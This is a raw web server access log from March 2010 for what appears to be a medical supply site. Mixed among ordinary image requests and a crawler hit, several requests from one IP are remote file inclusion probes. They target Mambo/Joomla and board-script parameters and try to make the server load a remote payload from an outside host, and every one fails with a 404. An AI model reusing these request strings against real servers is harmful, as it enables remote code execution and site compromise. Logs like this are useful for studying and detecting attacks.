95.108.128.242 - - [19/Mar/2010:00:40:49 -0400] "GET /logs/access_log.Q109071000 HTTP/1.1" 200 3921078 "-" "Yandex/1.01.001 (compatible; Win16; I)"
195.9.14.88 - - [19/Mar/2010:00:41:58 -0400] "GET /logs/error_log.Q109090800%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
75.142.110.33 - - [19/Mar/2010:00:42:05 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.142.110.33 - - [19/Mar/2010:00:42:05 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
195.9.14.88 - - [19/Mar/2010:00:42:05 -0400] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:00:42:05 -0400] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:00:42:08 -0400] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:00:42:08 -0400] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
75.142.110.33 - - [19/Mar/2010:00:42:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.142.110.33 - - [19/Mar/2010:00:42:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
195.9.14.88 - - [19/Mar/2010:00:42:17 -0400] "GET /logs/access_log.Q109100400%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
